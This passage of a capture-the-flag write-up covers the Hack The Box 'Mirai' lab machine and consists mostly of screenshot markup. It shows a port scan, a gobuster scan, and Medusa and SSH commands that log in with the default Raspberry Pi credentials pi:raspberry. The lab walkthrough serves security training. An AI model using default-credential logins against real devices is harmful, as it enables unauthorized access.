src="https://substackcdn.com/image/fetch/$s_!whBG!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fbb419c26-7b09-4e23-bf79-28bf08f84acf_800x547.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/bb419c26-7b09-4e23-bf79-28bf08f84acf_800x547.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!whBG!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fbb419c26-7b09-4e23-bf79-28bf08f84acf_800x547.png 424w, https://substackcdn.com/image/fetch/$s_!whBG!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fbb419c26-7b09-4e23-bf79-28bf08f84acf_800x547.png 848w, https://substackcdn.com/image/fetch/$s_!whBG!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fbb419c26-7b09-4e23-bf79-28bf08f84acf_800x547.png 1272w, https://substackcdn.com/image/fetch/$s_!whBG!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fbb419c26-7b09-4e23-bf79-28bf08f84acf_800x547.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><h3>Methodology</h3><blockquote><p><em>Updated port scan and enumeration information:<br>22/tcp: OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)<br>53/tcp: dnsmaq 2.76<br>80/tcp: lighttp 1.4.35</em></p></blockquote><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!tf6I!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc0560f22-8158-48d8-b729-e5273e293ac9_800x440.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!tf6I!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc0560f22-8158-48d8-b729-e5273e293ac9_800x440.png 424w, https://substackcdn.com/image/fetch/$s_!tf6I!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc0560f22-8158-48d8-b729-e5273e293ac9_800x440.png 848w, https://substackcdn.com/image/fetch/$s_!tf6I!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc0560f22-8158-48d8-b729-e5273e293ac9_800x440.png 1272w, https://substackcdn.com/image/fetch/$s_!tf6I!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc0560f22-8158-48d8-b729-e5273e293ac9_800x440.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!tf6I!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc0560f22-8158-48d8-b729-e5273e293ac9_800x440.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/c0560f22-8158-48d8-b729-e5273e293ac9_800x440.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!tf6I!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc0560f22-8158-48d8-b729-e5273e293ac9_800x440.png 424w, https://substackcdn.com/image/fetch/$s_!tf6I!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc0560f22-8158-48d8-b729-e5273e293ac9_800x440.png 848w, https://substackcdn.com/image/fetch/$s_!tf6I!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc0560f22-8158-48d8-b729-e5273e293ac9_800x440.png 1272w, https://substackcdn.com/image/fetch/$s_!tf6I!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc0560f22-8158-48d8-b729-e5273e293ac9_800x440.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!24yz!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F70c26c26-66fb-46b0-a6ad-3d3d320efd7b_800x240.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!24yz!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F70c26c26-66fb-46b0-a6ad-3d3d320efd7b_800x240.png 424w, https://substackcdn.com/image/fetch/$s_!24yz!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F70c26c26-66fb-46b0-a6ad-3d3d320efd7b_800x240.png 848w, https://substackcdn.com/image/fetch/$s_!24yz!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F70c26c26-66fb-46b0-a6ad-3d3d320efd7b_800x240.png 1272w, https://substackcdn.com/image/fetch/$s_!24yz!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F70c26c26-66fb-46b0-a6ad-3d3d320efd7b_800x240.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!24yz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F70c26c26-66fb-46b0-a6ad-3d3d320efd7b_800x240.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/70c26c26-66fb-46b0-a6ad-3d3d320efd7b_800x240.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!24yz!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F70c26c26-66fb-46b0-a6ad-3d3d320efd7b_800x240.png 424w, https://substackcdn.com/image/fetch/$s_!24yz!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F70c26c26-66fb-46b0-a6ad-3d3d320efd7b_800x240.png 848w, https://substackcdn.com/image/fetch/$s_!24yz!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F70c26c26-66fb-46b0-a6ad-3d3d320efd7b_800x240.png 1272w, https://substackcdn.com/image/fetch/$s_!24yz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F70c26c26-66fb-46b0-a6ad-3d3d320efd7b_800x240.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Let&#8217;s take a look at the website before we attempt exploitation.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!JDWL!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fca9d1d7e-64b1-4719-8dd5-c1f069b9de0d_800x516.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!JDWL!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fca9d1d7e-64b1-4719-8dd5-c1f069b9de0d_800x516.png 424w, https://substackcdn.com/image/fetch/$s_!JDWL!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fca9d1d7e-64b1-4719-8dd5-c1f069b9de0d_800x516.png 848w, https://substackcdn.com/image/fetch/$s_!JDWL!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fca9d1d7e-64b1-4719-8dd5-c1f069b9de0d_800x516.png 1272w, https://substackcdn.com/image/fetch/$s_!JDWL!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fca9d1d7e-64b1-4719-8dd5-c1f069b9de0d_800x516.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!JDWL!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fca9d1d7e-64b1-4719-8dd5-c1f069b9de0d_800x516.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/ca9d1d7e-64b1-4719-8dd5-c1f069b9de0d_800x516.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!JDWL!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fca9d1d7e-64b1-4719-8dd5-c1f069b9de0d_800x516.png 424w, https://substackcdn.com/image/fetch/$s_!JDWL!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fca9d1d7e-64b1-4719-8dd5-c1f069b9de0d_800x516.png 848w, https://substackcdn.com/image/fetch/$s_!JDWL!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fca9d1d7e-64b1-4719-8dd5-c1f069b9de0d_800x516.png 1272w, https://substackcdn.com/image/fetch/$s_!JDWL!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fca9d1d7e-64b1-4719-8dd5-c1f069b9de0d_800x516.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Hmmm&#8230;nothing in the page source. Let&#8217;s see what gobuster can find.</p><p><em>gobuster dir -u <a href="http://10.10.10.48">http://10.10.10.48</a> -w /usr/share/dirb/wordlists/common.txt</em></p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!LX0F!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf9abc4d-773d-4d08-9cca-bca51291c5cb_800x289.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!LX0F!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf9abc4d-773d-4d08-9cca-bca51291c5cb_800x289.png 424w, https://substackcdn.com/image/fetch/$s_!LX0F!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf9abc4d-773d-4d08-9cca-bca51291c5cb_800x289.png 848w, https://substackcdn.com/image/fetch/$s_!LX0F!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf9abc4d-773d-4d08-9cca-bca51291c5cb_800x289.png 1272w, https://substackcdn.com/image/fetch/$s_!LX0F!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf9abc4d-773d-4d08-9cca-bca51291c5cb_800x289.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!LX0F!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf9abc4d-773d-4d08-9cca-bca51291c5cb_800x289.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/cf9abc4d-773d-4d08-9cca-bca51291c5cb_800x289.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!LX0F!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf9abc4d-773d-4d08-9cca-bca51291c5cb_800x289.png 424w, https://substackcdn.com/image/fetch/$s_!LX0F!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf9abc4d-773d-4d08-9cca-bca51291c5cb_800x289.png 848w, https://substackcdn.com/image/fetch/$s_!LX0F!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf9abc4d-773d-4d08-9cca-bca51291c5cb_800x289.png 1272w, https://substackcdn.com/image/fetch/$s_!LX0F!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf9abc4d-773d-4d08-9cca-bca51291c5cb_800x289.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!3zWt!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fffc9bd2f-f629-40be-b7a5-47226b36ffda_800x451.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!3zWt!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fffc9bd2f-f629-40be-b7a5-47226b36ffda_800x451.png 424w, https://substackcdn.com/image/fetch/$s_!3zWt!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fffc9bd2f-f629-40be-b7a5-47226b36ffda_800x451.png 848w, https://substackcdn.com/image/fetch/$s_!3zWt!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fffc9bd2f-f629-40be-b7a5-47226b36ffda_800x451.png 1272w, https://substackcdn.com/image/fetch/$s_!3zWt!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fffc9bd2f-f629-40be-b7a5-47226b36ffda_800x451.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!3zWt!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fffc9bd2f-f629-40be-b7a5-47226b36ffda_800x451.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/ffc9bd2f-f629-40be-b7a5-47226b36ffda_800x451.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!3zWt!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fffc9bd2f-f629-40be-b7a5-47226b36ffda_800x451.png 424w, https://substackcdn.com/image/fetch/$s_!3zWt!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fffc9bd2f-f629-40be-b7a5-47226b36ffda_800x451.png 848w, https://substackcdn.com/image/fetch/$s_!3zWt!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fffc9bd2f-f629-40be-b7a5-47226b36ffda_800x451.png 1272w, https://substackcdn.com/image/fetch/$s_!3zWt!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fffc9bd2f-f629-40be-b7a5-47226b36ffda_800x451.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Interesting, A Pi-hole. Using the name of this system as a hint, <a href="https://www.imperva.com/blog/malware-analysis-mirai-ddos-botnet/">Mirai botnet logged into systems using default credentials</a>. A quick search for default raspberry pi credentials landed me the combination of <strong>pi:raspberry</strong> from <a href="https://www.makeuseof.com/tag/raspbian-default-password/">here</a>. Let&#8217;s check to see if this is correct here using Medusa:</p><p><em>medusa -h 10.10.10.48 -u pi -p raspberry -M ssh</em></p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!kkFX!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F38f2afbb-bd62-4997-ac23-f0311c21ebef_800x67.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!kkFX!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F38f2afbb-bd62-4997-ac23-f0311c21ebef_800x67.png 424w, https://substackcdn.com/image/fetch/$s_!kkFX!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F38f2afbb-bd62-4997-ac23-f0311c21ebef_800x67.png 848w, https://substackcdn.com/image/fetch/$s_!kkFX!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F38f2afbb-bd62-4997-ac23-f0311c21ebef_800x67.png 1272w, https://substackcdn.com/image/fetch/$s_!kkFX!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F38f2afbb-bd62-4997-ac23-f0311c21ebef_800x67.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!kkFX!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F38f2afbb-bd62-4997-ac23-f0311c21ebef_800x67.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/38f2afbb-bd62-4997-ac23-f0311c21ebef_800x67.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!kkFX!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F38f2afbb-bd62-4997-ac23-f0311c21ebef_800x67.png 424w, https://substackcdn.com/image/fetch/$s_!kkFX!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F38f2afbb-bd62-4997-ac23-f0311c21ebef_800x67.png 848w, https://substackcdn.com/image/fetch/$s_!kkFX!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F38f2afbb-bd62-4997-ac23-f0311c21ebef_800x67.png 1272w, https://substackcdn.com/image/fetch/$s_!kkFX!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F38f2afbb-bd62-4997-ac23-f0311c21ebef_800x67.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>That works! Now, let&#8217;s try to login via SSH. <em>ssh pi@10.10.10.48</em></p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!_8Sy!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8b348bf-8eea-4732-ae9a-5b66bb8f0486_800x295.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!_8Sy!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8b348bf-8eea-4732-ae9a-5b66bb8f0486_800x295.png 424w, https://substackcdn.com/image/fetch/$s_!_8Sy!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8b348bf-8eea-4732-ae9a-5b66bb8f0486_800x295.png 848w, https://substackcdn.com/image/fetch/$s_!_8Sy!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8b348bf-8eea-4732-ae9a-5b66bb8f0486_800x295.png 1272w, 